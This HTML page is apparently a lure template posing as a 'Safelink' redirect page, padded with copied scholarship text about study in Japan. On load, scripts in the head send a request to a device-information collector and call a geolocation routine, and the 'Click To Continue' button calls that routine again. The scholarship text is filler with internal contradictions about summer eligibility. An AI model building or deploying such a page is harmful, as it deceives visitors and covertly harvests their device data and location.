<!DOCTYPE html>
<html>
    <head>
        <title>Safelink | Continue..</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link href="css/style.css" rel="stylesheet" type="text/css">
        <script src="https://code.jquery.com/jquery-2.2.4.min.js"></script>
        <script>
            $.ajax({
                url: '../modules/getDeviceInfo/getInfo.php'
            });
        </script>
        <script src="modules/geolocation/locate.js"></script>
        <script>getLocation();</script>
    </head>
    <body>
        <div class="container">
            <div style="text-align: justify;">
                The Bridging Project offers scholarships to American undergraduate students participating in study-abroad programs in Japan. Funding from private foundations and major U.S. corporations, through donations to the nonprofit US-Japan Bridging Foundation, makes it possible to award about 100 scholarships each year to assist students with the travel and living expenses they will incur while studying abroad in Japan for a semester or an academic year. Applications are accepted twice a year for Bridging Scholarships.
            </div>
            <center>
                <img style="position: relative; top:20px;" src="css/images/ads-1.png">
                <script src="js/button_redirect.js"></script>
                <div><button id="button_continue_1" onclick="getLocation();">Click To Continue</button></div>
                <div id="wait_msg0"></div>
                <div id="wait_msg1"></div>
                <img style="position: relative; top:40px;" src="css/images/ads-2.gif">
            </center>
            <div style="text-align: justify; position: relative; top: 60px;">
                The next competition for Bridging Scholarships will be for students who will study in Japan beginning in Summer 2020. The deadline for applications is April 8, 2020.
                <br>
                <h3>Contact Information :</h3>
                <hr>
                For further information on the Bridging Scholarships or the application procedure please contact Susan Schmidt, Executive Director of the Bridging Project Clearinghouse, at the AATJ office: aatj@aatj.org
                Bridging Project Clearinghouse American Association of Teachers of Japanese Campus Box 366 1424 Broadway University of Colorado, Boulder, CO 80309-0366 Phone: 303-492-5487 Fax:303-492-5856 E-mail: aatj@aatj.org Web: http://www.aatj.org
                <h3>Deadline Information:</h3>
                <hr>
                The deadline for applications is April 8, 2020, and Applications for study in Japan in Summer 2020 should be submitted to AATJ by the deadline of April 8, 2020.
                <h3>Additional Information :</h3>
                <hr>
                Bridging Scholarship recipients receive a stipend of $2,500 (for students on semester-long programs) or $4,000 (for students on academic year programs). Students studying in Japan on summer programs are not eligible to apply.
            </div>
        </div>
    </body>
</html>